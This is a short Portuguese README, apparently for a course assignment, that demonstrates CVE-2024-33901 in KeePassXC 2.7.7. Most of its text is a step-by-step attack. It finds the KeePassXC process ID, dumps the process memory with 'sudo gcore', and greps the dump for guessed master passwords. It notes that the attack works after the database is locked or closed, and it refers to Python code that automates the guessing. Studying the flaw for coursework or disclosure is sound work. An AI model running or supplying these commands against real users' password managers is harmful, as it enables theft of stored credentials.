
Pequeno programa que demonstra a vulnerabilidade CVE-2024-33901 no KeePassXC versão 2.7.7
Programa curto que demonstra a vulnerabilidade CVE-2024-33901 no KeePassXC versão 2.7.7
O relatório para a disciplina pode precisar do código fonte vinculado, por isso criei o repositório para isso
Isso pode ser feito obtendo o PID, o que pode ser feito com este comando:
ps aux | grep keepassxc
E então executando este comando: sudo gcore -o keepassxc_dump PID_HERE
Por exemplo, se o PID que você obteve foi 1234, então o comando teria que ser:
sudo gcore -o keepassxc_dump 1234
3. Finalmente, você pode executar este comando: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
Então se o PID fosse 1234, o comando seria:
cat keepassxc_dump.1234 | strings | grep "password guess here"
Uma vez que o arquivo de dump de memória é criado, o ataque pode ser realizado mesmo se o banco de dados for bloqueado novamente ou se o KeePassXC for fechado.
O código Python fornecido executa todas essas etapas e tenta múltiplos palpites de senha com base nos arquivos de texto fornecidos.